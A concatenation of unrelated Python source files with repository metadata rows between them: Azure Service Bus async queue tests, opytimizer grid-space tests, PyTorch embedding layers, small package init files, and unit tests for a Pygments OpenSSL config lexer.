message = Message(content)
await sender.send(message)
async with queue_client.get_receiver() as receiver:
messages = await receiver.fetch_next(timeout=10)
assert len(messages) == 1
time.sleep(15)
await messages[0].renew_lock()
time.sleep(15)
await messages[0].renew_lock()
time.sleep(15)
assert not messages[0].expired
await messages[0].complete()
async with queue_client.get_receiver() as receiver:
messages = await receiver.fetch_next(timeout=10)
assert len(messages) == 0
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_message_receive_and_delete(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
async with queue_client.get_sender() as sender:
message = Message("Receive and delete test")
await sender.send(message)
async with queue_client.get_receiver(mode=ReceiveSettleMode.ReceiveAndDelete) as receiver:
messages = await receiver.fetch_next(timeout=10)
assert len(messages) == 1
received = messages[0]
print_message(received)
with pytest.raises(MessageAlreadySettled):
await received.complete()
with pytest.raises(MessageAlreadySettled):
await received.abandon()
with pytest.raises(MessageAlreadySettled):
await received.defer()
with pytest.raises(MessageAlreadySettled):
await received.dead_letter()
with pytest.raises(MessageAlreadySettled):
await received.renew_lock()
time.sleep(30)
async with queue_client.get_receiver() as receiver:
messages = await receiver.fetch_next(timeout=10)
for m in messages:
print_message(m)
assert len(messages) == 0
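# BatchMessage wraps a generator of payloads so several messages go out in one batched send operation;
# the receiver still sees them as five individual messages.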
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_message_batch(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
def message_content():
for i in range(5):
yield "Message no. {}".format(i)
async with queue_client.get_sender() as sender:
message = BatchMessage(message_content())
await sender.send(message)
async with queue_client.get_receiver() as receiver:
messages = await receiver.fetch_next(timeout=10)
recv = True
while recv:
recv = await receiver.fetch_next(timeout=10)
messages.extend(recv)
assert len(messages) == 5
for m in messages:
print_message(m)
await m.complete()
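# Scheduling: message.schedule(enqueue_time) stamps a future enqueue time, so the message only becomes
# receivable once that time is reached (hence the 120-second receive timeout below).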
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_schedule_message(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
import uuid
queue_client = client.get_queue(standard_queue)
enqueue_time = (datetime.now() + timedelta(minutes=2)).replace(microsecond=0)
async with queue_client.get_receiver() as receiver:
async with queue_client.get_sender() as sender:
content = str(uuid.uuid4())
message_id = uuid.uuid4()
message = Message(content)
message.properties.message_id = message_id
message.schedule(enqueue_time)
await sender.send(message)
messages = await receiver.fetch_next(timeout=120)
if messages:
try:
data = str(messages[0])
assert data == content
assert messages[0].properties.message_id == message_id
assert messages[0].scheduled_enqueue_time == enqueue_time
assert messages[0].scheduled_enqueue_time == messages[0].enqueued_time.replace(microsecond=0)
assert len(messages) == 1
finally:
for m in messages:
await m.complete()
else:
raise Exception("Failed to receive schdeduled message.")
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_schedule_multiple_messages(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
import uuid
queue_client = client.get_queue(standard_queue)
enqueue_time = (datetime.now() + timedelta(minutes=2)).replace(microsecond=0)
messages = []
async with queue_client.get_receiver(prefetch=20) as receiver:
async with queue_client.get_sender() as sender:
content = str(uuid.uuid4())
message_id_a = uuid.uuid4()
message_a = Message(content)
message_a.properties.message_id = message_id_a
message_id_b = uuid.uuid4()
message_b = Message(content)
message_b.properties.message_id = message_id_b
tokens = await sender.schedule(enqueue_time, message_a, message_b)
assert len(tokens) == 2
recv = await receiver.fetch_next(timeout=120)
messages.extend(recv)
recv = await receiver.fetch_next(timeout=5)
messages.extend(recv)
if messages:
try:
data = str(messages[0])
assert data == content
assert messages[0].properties.message_id in (message_id_a, message_id_b)
assert messages[0].scheduled_enqueue_time == enqueue_time
assert messages[0].scheduled_enqueue_time == messages[0].enqueued_time.replace(microsecond=0)
assert len(messages) == 2
finally:
for m in messages:
await m.complete()
else:
raise Exception("Failed to receive schdeduled message.")
@pytest.mark.liveTest
@pytest.mark.asyncio
async def test_async_queue_cancel_scheduled_messages(live_servicebus_config, standard_queue):
client = ServiceBusClient(
service_namespace=live_servicebus_config['hostname'],
shared_access_key_name=live_servicebus_config['key_name'],
shared_access_key_value=live_servicebus_config['access_key'],
debug=True)
queue_client = client.get_queue(standard_queue)
enqueue_time = (datetime.now() + timedelta(minutes=2)).replace(microsecond=0)
async with queue_client.get_receiver() as receiver:
async with queue_client.get_sender() as sender:
message_a = Message("Test scheduled message")
message_b = Message("Test scheduled message")
tokens = await sender.schedule(enqueue_time, message_a, message_b)
assert len(tokens) == 2
await sender.cancel_scheduled_messages(*tokens)
messages = await receiver.fetch_next(timeout=120)
assert len(messages) == 0
| 39.530806
| 145
| 0.686752
| 4,852
| 41,705
| 5.639324
| 0.054411
| 0.058695
| 0.083327
| 0.04678
| 0.845662
| 0.8298
| 0.797201
| 0.765514
| 0.749287
| 0.739566
| 0
| 0.010063
| 0.225632
| 41,705
| 1,054
| 146
| 39.568311
| 0.837188
| 0.007145
| 0
| 0.778271
| 0
| 0
| 0.044297
| 0.000628
| 0
| 0
| 0
| 0
| 0.105322
| 1
| 0.004435
| false
| 0.001109
| 0.019956
| 0
| 0.025499
| 0.033259
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9f9152b584be2f7d121426c0104a226ca6fa1050
| 72
|
py
|
Python
|
tse_dataloader/__init__.py
|
aliik7/tse_dataloader
|
3085b65a7d9f4f47d0d21ad2857f9e562f0d7b95
|
[
"MIT"
] | 1
|
2021-02-25T09:53:16.000Z
|
2021-02-25T09:53:16.000Z
|
tse_dataloader/__init__.py
|
aliik7/tse_dataloader
|
3085b65a7d9f4f47d0d21ad2857f9e562f0d7b95
|
[
"MIT"
] | null | null | null |
tse_dataloader/__init__.py
|
aliik7/tse_dataloader
|
3085b65a7d9f4f47d0d21ad2857f9e562f0d7b95
|
[
"MIT"
] | 1
|
2021-01-22T21:24:34.000Z
|
2021-01-22T21:24:34.000Z
|
from tse_dataloader import download
from tse_dataloader import analysis
| 36
| 36
| 0.888889
| 10
| 72
| 6.2
| 0.6
| 0.225806
| 0.548387
| 0.741935
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111111
| 72
| 2
| 37
| 36
| 0.96875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
9fb5ded4a3dfc6b325b348d6e8ebdec4b7d2df60
| 1,277
|
py
|
Python
|
tests/opytimizer/spaces/test_grid.py
|
anukaal/opytimizer
|
5f1ccc0da80e6a4cabd99578fa24cf4f6466f9b9
|
[
"Apache-2.0"
] | 528
|
2018-10-01T20:00:09.000Z
|
2022-03-27T11:15:31.000Z
|
tests/opytimizer/spaces/test_grid.py
|
anukaal/opytimizer
|
5f1ccc0da80e6a4cabd99578fa24cf4f6466f9b9
|
[
"Apache-2.0"
] | 17
|
2019-10-30T00:47:03.000Z
|
2022-03-21T11:39:28.000Z
|
tests/opytimizer/spaces/test_grid.py
|
anukaal/opytimizer
|
5f1ccc0da80e6a4cabd99578fa24cf4f6466f9b9
|
[
"Apache-2.0"
] | 35
|
2018-10-01T20:03:23.000Z
|
2022-03-20T03:54:15.000Z
|
import numpy as np
from opytimizer.spaces import grid
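# GridSpace is constructed here as GridSpace(1, 0.1, 0, 1) (presumably n_variables, step, lower bound,
# upper bound); with a step of 0.1 over [0, 1] the resulting grid holds 11 points, which the assertions
# below rely on.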
def test_grid_space_step():
new_grid_space = grid.GridSpace(1, 0.1, 0, 1)
assert new_grid_space.step == 0.1
def test_grid_space_step_setter():
new_grid_space = grid.GridSpace(1, 0.1, 0, 1)
try:
new_grid_space.step = 'a'
except:
new_grid_space.step = np.array([0.1])
assert new_grid_space.step == 0.1
try:
new_grid_space.step = np.array([0.1, 0.1])
except:
new_grid_space.step = np.array([0.1])
assert new_grid_space.step == 0.1
def test_grid_space_grid():
new_grid_space = grid.GridSpace(1, 0.1, 0, 1)
assert len(new_grid_space.grid) == 11
def test_grid_space_grid_setter():
try:
new_grid_space = grid.GridSpace(1, 0.1, 0, 1)
new_grid_space.grid = 'a'
except:
new_grid_space = grid.GridSpace(1, 0.1, 0, 1)
new_grid_space.grid = np.array([1, 1])
assert len(new_grid_space.grid) == 2
def test_grid_create_grid():
new_grid_space = grid.GridSpace(1, 0.1, 0, 1)
new_grid_space._create_grid()
assert len(new_grid_space.grid) == 11
def test_grid_initialize_agents():
new_grid_space = grid.GridSpace(1, 0.1, 0, 1)
assert new_grid_space.agents[0].position[0] != 1
| 21.644068
| 53
| 0.654659
| 217
| 1,277
| 3.557604
| 0.138249
| 0.291451
| 0.326425
| 0.248705
| 0.812176
| 0.770725
| 0.770725
| 0.708549
| 0.676166
| 0.676166
| 0
| 0.059178
| 0.219264
| 1,277
| 58
| 54
| 22.017241
| 0.715145
| 0
| 0
| 0.571429
| 0
| 0
| 0.001566
| 0
| 0
| 0
| 0
| 0
| 0.2
| 1
| 0.171429
| false
| 0
| 0.057143
| 0
| 0.228571
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9fc3ff215ec8aab83d370f28e8cb17ca61bd0dce
| 2,737
|
py
|
Python
|
src/embedding.py
|
HKUST-KnowComp/NeuralSubIsoCnt
|
7d1deef8e49af90122ea0ad099dec1de390927b6
|
[
"MIT"
] | 28
|
2020-06-20T14:45:27.000Z
|
2022-02-18T06:54:53.000Z
|
src/embedding.py
|
HKUST-KnowComp/NeuralSubIsoCnt
|
7d1deef8e49af90122ea0ad099dec1de390927b6
|
[
"MIT"
] | 5
|
2020-08-04T04:11:17.000Z
|
2021-05-27T13:11:22.000Z
|
src/embedding.py
|
HKUST-KnowComp/NeuralSubIsoCnt
|
7d1deef8e49af90122ea0ad099dec1de390927b6
|
[
"MIT"
] | 5
|
2020-08-25T05:02:18.000Z
|
2021-07-16T06:31:31.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from utils import extend_dimensions
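# Three drop-in embedding layers built on a bias-free nn.Linear: NormalEmbedding (Gaussian init),
# OrthogonalEmbedding (orthogonal init) and EquivariantEmbedding (circularly shifted columns).
# Each supports increase_input_size(), which swaps in a wider linear layer via extend_dimensions()
# while keeping the embedding dimension fixed.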
class NormalEmbedding(nn.Module):
def __init__(self, input_dim, emb_dim):
super(NormalEmbedding, self).__init__()
self.input_dim = input_dim
self.emb_dim = emb_dim
self.emb_layer = nn.Linear(input_dim, emb_dim, bias=False)
# init
nn.init.normal_(self.emb_layer.weight, 0.0, 1.0)
def increase_input_size(self, new_input_dim):
assert new_input_dim >= self.input_dim
if new_input_dim != self.input_dim:
new_emb_layer = extend_dimensions(self.emb_layer, new_input_dim=new_input_dim, upper=False)
del self.emb_layer
self.emb_layer = new_emb_layer
self.input_dim = new_input_dim
def forward(self, x):
emb = self.emb_layer(x)
return emb
class OrthogonalEmbedding(nn.Module):
def __init__(self, input_dim, emb_dim):
super(OrthogonalEmbedding, self).__init__()
self.input_dim = input_dim
self.emb_dim = emb_dim
self.emb_layer = nn.Linear(input_dim, emb_dim, bias=False)
# init
nn.init.orthogonal_(self.emb_layer.weight)
def increase_input_size(self, new_input_dim):
assert new_input_dim >= self.input_dim
if new_input_dim != self.input_dim:
new_emb_layer = extend_dimensions(self.emb_layer, new_input_dim=new_input_dim, upper=False)
del self.emb_layer
self.emb_layer = new_emb_layer
self.input_dim = new_input_dim
def forward(self, x):
emb = self.emb_layer(x)
return emb
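# EquivariantEmbedding draws only the first weight column at random and fills column i with
# torch.roll(column_0, i), so for one-hot inputs a cyclic shift of the active index cyclically
# shifts the output embedding.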
class EquivariantEmbedding(nn.Module):
def __init__(self, input_dim, emb_dim):
super(EquivariantEmbedding, self).__init__()
self.input_dim = input_dim
self.emb_dim = emb_dim
self.emb_layer = nn.Linear(input_dim, emb_dim, bias=False)
# init
nn.init.normal_(self.emb_layer.weight[:,0], 0.0, 1.0)
emb_column = self.emb_layer.weight[:,0]
with torch.no_grad():
for i in range(1, self.input_dim):
self.emb_layer.weight[:,i].data.copy_(torch.roll(emb_column, i, 0))
def increase_input_size(self, new_input_dim):
assert new_input_dim >= self.input_dim
if new_input_dim != self.input_dim:
new_emb_layer = extend_dimensions(self.emb_layer, new_input_dim=new_input_dim, upper=False)
del self.emb_layer
self.emb_layer = new_emb_layer
self.input_dim = new_input_dim
def forward(self, x):
emb = self.emb_layer(x)
return emb
| 36.493333
| 104
| 0.635002
| 386
| 2,737
| 4.132124
| 0.134715
| 0.200627
| 0.15047
| 0.060188
| 0.796865
| 0.784953
| 0.784953
| 0.784953
| 0.784953
| 0.784953
| 0
| 0.006054
| 0.275849
| 2,737
| 75
| 105
| 36.493333
| 0.798688
| 0.005115
| 0
| 0.711864
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.050847
| 1
| 0.152542
| false
| 0
| 0.067797
| 0
| 0.322034
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e225b4af018d175076e6fb5e191447f86b9f1af1
| 118
|
py
|
Python
|
automl_infrastructure/pipeline/__init__.py
|
barak1412/automl_infrastructure
|
e8a291d175237bb7f74ebae5d6f5d2f8bcf5dc32
|
[
"MIT"
] | null | null | null |
automl_infrastructure/pipeline/__init__.py
|
barak1412/automl_infrastructure
|
e8a291d175237bb7f74ebae5d6f5d2f8bcf5dc32
|
[
"MIT"
] | null | null | null |
automl_infrastructure/pipeline/__init__.py
|
barak1412/automl_infrastructure
|
e8a291d175237bb7f74ebae5d6f5d2f8bcf5dc32
|
[
"MIT"
] | null | null | null |
from automl_infrastructure.pipeline.base import Pipeline
from automl_infrastructure.pipeline.steps.base import Step
| 23.6
| 58
| 0.872881
| 15
| 118
| 6.733333
| 0.533333
| 0.19802
| 0.475248
| 0.633663
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084746
| 118
| 4
| 59
| 29.5
| 0.935185
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
e24489a69ed9d22d78fd5edee09268dd1e8dac2e
| 25,609
|
py
|
Python
|
tests/test_lexer.py
|
stefanholek/pygments-openssl
|
26c530dce2f175c3c3e65b96af21a8ee5423dc99
|
[
"BSD-2-Clause"
] | 2
|
2015-02-22T08:22:07.000Z
|
2015-10-16T13:53:06.000Z
|
tests/test_lexer.py
|
stefanholek/pygments-openssl
|
26c530dce2f175c3c3e65b96af21a8ee5423dc99
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_lexer.py
|
stefanholek/pygments-openssl
|
26c530dce2f175c3c3e65b96af21a8ee5423dc99
|
[
"BSD-2-Clause"
] | null | null | null |
import unittest
from pygments_openssl.lexer import T_SPACE
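# These tests run small config snippets through Pygments and compare the token stream produced by the
# custom 'openssl' lexer against the stock 'ini' (and occasionally 'bash') lexers; T_SPACE is the
# whitespace token emitted between the tokens of interest.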
class LexerTests(unittest.TestCase):
def lex(self, code, lexer_name):
from pygments import lex, lexers
return list(lex(code, lexers.get_lexer_by_name(lexer_name)))
def test_lex_comment(self):
from pygments import token
tokens = self.lex('# Comment\n', 'openssl')
self.assertEqual(tokens[0], (token.Comment, '# Comment'))
self.assertEqual(tokens[1], (T_SPACE, '\n'))
tokens = self.lex('# Comment\n', 'ini')
self.assertEqual(tokens[0], (token.Comment.Single, '# Comment'))
self.assertEqual(tokens[1], (T_SPACE, '\n'))
tokens = self.lex('# Comment\n', 'bash')
self.assertEqual(tokens[0], (token.Comment.Single, '# Comment\n'))
def test_lex_section_header(self):
from pygments import token
tokens = self.lex('[ default ]\n', 'openssl')
self.assertEqual(tokens[0], (token.Keyword, '[ default ]'))
self.assertEqual(tokens[1], (T_SPACE, '\n'))
tokens = self.lex('[ default ]\n', 'ini')
self.assertEqual(tokens[0], (token.Keyword, '[ default ]'))
self.assertEqual(tokens[1], (T_SPACE, '\n'))
def test_lex_lhs_and_operator(self):
from pygments import token
tokens = self.lex('dir = .\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
tokens = self.lex('dir = .\n', 'ini')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
def test_lex_lhs_line_continuation(self):
from pygments import token
tokens = self.lex('dir \\\n = .\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.String.Escape, '\\'))
self.assertEqual(tokens[3], (T_SPACE, '\n '))
self.assertEqual(tokens[4], (token.Operator, '='))
self.assertEqual(tokens[5], (T_SPACE, ' '))
def test_lex_rhs_line_continuation(self):
from pygments import token
tokens = self.lex('dir = \\\n.\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String.Escape, '\\'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_rhs_string(self):
from pygments import token
tokens = self.lex('dir = .\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, '.'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
tokens = self.lex('dir = .\n', 'ini')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, '.'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_rhs_comment(self):
from pygments import token
tokens = self.lex('dir = . # Comment\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, '.'))
self.assertEqual(tokens[5], (T_SPACE, ' '))
self.assertEqual(tokens[6], (token.Comment, '# Comment'))
self.assertEqual(tokens[7], (T_SPACE, '\n'))
tokens = self.lex('dir = . # Comment\n', 'ini')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, '. # Comment'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_rhs_double_quoted_string(self):
from pygments import token
tokens = self.lex('dir = "foo bar"\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String.Double, '"foo bar"'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
tokens = self.lex('dir = "foo bar"\n', 'ini')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, '"foo bar"'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_rhs_single_quoted_string(self):
from pygments import token
tokens = self.lex("dir = 'foo bar'\n", 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String.Single, "'foo bar'"))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
tokens = self.lex("dir = 'foo bar'\n", 'ini')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, "'foo bar'"))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_rhs_variable_name(self):
from pygments import token
tokens = self.lex('foo = $variable\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'foo'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.Name.Variable, '$variable'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_rhs_variable_name_curly_braces(self):
from pygments import token
tokens = self.lex('foo = ${ENV::variable}\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'foo'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.Name.Variable, '${ENV::variable}'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_rhs_variable_name_parentheses(self):
from pygments import token
tokens = self.lex('foo = $(ENV::variable)\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'foo'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.Name.Variable, '$(ENV::variable)'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_rhs_oid(self):
from pygments import token
tokens = self.lex('oid = 1.2.3.4.5\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'oid'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.Name.Function, '1.2.3.4.5'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_rhs_number(self):
from pygments import token
tokens = self.lex('num = 12\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'num'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, '12'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_rhs_section_reference(self):
from pygments import token
tokens = self.lex('foo = @section\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'foo'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.Name.Constant, '@section'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_rhs_critical_keyword(self):
from pygments import token
tokens = self.lex('foo = critical,bar\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'foo'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.Keyword.Pseudo, 'critical'))
self.assertEqual(tokens[5], (token.String, ',bar'))
self.assertEqual(tokens[6], (T_SPACE, '\n'))
def test_lex_incomplete_lhs(self):
from pygments import token
tokens = self.lex('dir\ndir = .\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[1], (T_SPACE, '\n'))
self.assertEqual(tokens[2], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.Operator, '='))
self.assertEqual(tokens[5], (T_SPACE, ' '))
self.assertEqual(tokens[6], (token.String, '.'))
self.assertEqual(tokens[7], (T_SPACE, '\n'))
def test_lex_incomplete_lhs_and_operator(self):
from pygments import token
tokens = self.lex('dir =\ndir = .\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, '\n'))
self.assertEqual(tokens[4], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[5], (T_SPACE, ' '))
self.assertEqual(tokens[6], (token.Operator, '='))
self.assertEqual(tokens[7], (T_SPACE, ' '))
self.assertEqual(tokens[8], (token.String, '.'))
self.assertEqual(tokens[9], (T_SPACE, '\n'))
def test_lex_incomplete_lhs_string(self):
from pygments import token
tokens = self.lex('dir', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, 'dir'))
def test_lex_missing_lhs(self):
from pygments import token
tokens = self.lex('= foo\ndir = .\n', 'openssl')
self.assertEqual(tokens[0], (token.Operator, '='))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.String, 'foo'))
self.assertEqual(tokens[3], (T_SPACE, '\n'))
self.assertEqual(tokens[4], (token.Name.Attribute, 'dir'))
self.assertEqual(tokens[5], (T_SPACE, ' '))
self.assertEqual(tokens[6], (token.Operator, '='))
self.assertEqual(tokens[7], (T_SPACE, ' '))
self.assertEqual(tokens[8], (token.String, '.'))
self.assertEqual(tokens[9], (T_SPACE, '\n'))
class DirectiveLexerTests(unittest.TestCase):
def lex(self, code, lexer_name):
from pygments import lex, lexers
return list(lex(code, lexers.get_lexer_by_name(lexer_name)))
def test_lex_directive(self):
from pygments import token
tokens = self.lex('.directive foo\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, '.directive'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.String, 'foo'))
self.assertEqual(tokens[3], (T_SPACE, '\n'))
def test_lex_directive_and_operator(self):
from pygments import token
tokens = self.lex('.directive = foo\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, '.directive'))
self.assertEqual(tokens[1], (T_SPACE, ' '))
self.assertEqual(tokens[2], (token.Operator, '='))
self.assertEqual(tokens[3], (T_SPACE, ' '))
self.assertEqual(tokens[4], (token.String, 'foo'))
self.assertEqual(tokens[5], (T_SPACE, '\n'))
def test_lex_directive_with_leading_whitespace(self):
from pygments import token
tokens = self.lex(' .directive foo\n', 'openssl')
self.assertEqual(tokens[0], (T_SPACE, ' '))
self.assertEqual(tokens[1], (token.Name.Attribute, '.directive'))
self.assertEqual(tokens[2], (T_SPACE, ' '))
self.assertEqual(tokens[3], (token.String, 'foo'))
self.assertEqual(tokens[4], (T_SPACE, '\n'))
def test_lex_incomplete_directive(self):
from pygments import token
tokens = self.lex('.directive\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, '.directive'))
self.assertEqual(tokens[1], (T_SPACE, '\n'))
tokens = self.lex('.directive\n.directive foo\n', 'openssl')
self.assertEqual(tokens[0], (token.Name.Attribute, '.directive'))
self.assertEqual(tokens[1], (T_SPACE, '\n'))
